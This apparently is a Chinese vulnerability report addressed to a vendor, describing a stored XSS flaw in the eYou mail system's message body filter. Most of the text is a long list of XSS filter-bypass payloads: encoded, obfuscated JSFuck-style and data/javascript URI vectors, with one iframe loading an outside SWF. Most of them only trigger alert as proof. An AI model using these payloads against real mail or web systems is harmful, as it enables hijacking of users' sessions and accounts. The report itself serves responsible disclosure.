eYou邮件系统邮件正文存储型XSS

### 简要描述： RT ### 详细说明： 以前老版本一直对XSS没啥防御，也就没好意思发。最近看手头上的一个eyou信箱升级到eyou5了。发现新版本开始对XSS进行过滤了就测试了一下，发现了一点问题。 #1 测试单个XSS攻击向量，如： ``` <img src=x onerror=alert(1)> ``` 还是可以抵挡的住的。 #2 不过情况稍微复杂一些，你们的过滤规则就招架不住了。如： ``` <script>alert(0)</script> <script>confirm(1)</script> <script>prompt(2)</script> <script>\u0061\u006C\u0065\u0072\u0074(3)</script> <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.$_$+")"+"\"")())();</script> <script>+alert(6)</script> <script test>alert(7)</script> <script>alert(/8/)</script> <script src=data:text/javascript,alert(9)></script> <script src=&#100&#97&#116&#97:text/javascript,alert(10)></script> <script>alert(String.fromCharCode(49,49))</script> <script>alert(/12/.source)</script> <script>setTimeout(alert(13),0)</script> <script>document['write'](14);</script> <anytag onmouseover=alert(15)>M <anytag onclick=alert(16)>M <a onmouseover=alert(17)>M <a onclick=alert(18)>M <a href=javascript:alert(19)>M <button/onclick=alert(20)>M <form><button formaction=javascript&colon;alert(21)>M <form/action=javascript:alert(22)><input/type=submit> <form onsubmit=alert(23)><button>M <img src=x onerror=alert(24)> <body/onload=alert(25)> <body onscroll=alert(26)> <input autofocus> <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;27&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <iframe src="http://0x.lv/xss.swf"></iframe> <iframe/onload=alert(document.domain)></iframe> <IFRAME SRC="javascript:alert(29);"></IFRAME> <meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E"> <object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object> <object data="javascript:alert(document.domain)"> <marquee onstart=alert(30)></marquee> <isindex type=image src=1 onerror=alert(31)> <isindex action=javascript:alert(32) type=image> <input onfocus=alert(33) autofocus> <input onblur=alert(34) autofocus><input autofocus> <INPUT TYPE="IMAGE" SRC=x onerror=alert(35)> <select onfocus=alert(36) autofocus> <textarea onfocus=alert(37) autofocus></textarea> <keygen onfocus=alert(38) autofocus> <FRAMESET><FRAME SRC="javascript:alert(document.domain);"></FRAMESET> <frameset onload=alert(40)> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"></embed> <embed src=javascript:alert(document.domain)> <math href="javascript:alert(45)">M <math> <maction actiontype="" xlink:href="javascript:alert(46)">M <math xlink:href=javascript:alert(47)>M ``` 面对较为复杂的场景时，你们的过滤规则就招架不住了。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/291648279cbb5030c88e675744ff312340d9e504.png" alt="111111111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/291648279cbb5030c88e675744ff312340d9e504.png) 因为是过滤器设计上的问题，所以我相信你们所有的版本都存在这个缺陷。如果重现上有困难可以发乌云短消息联系我。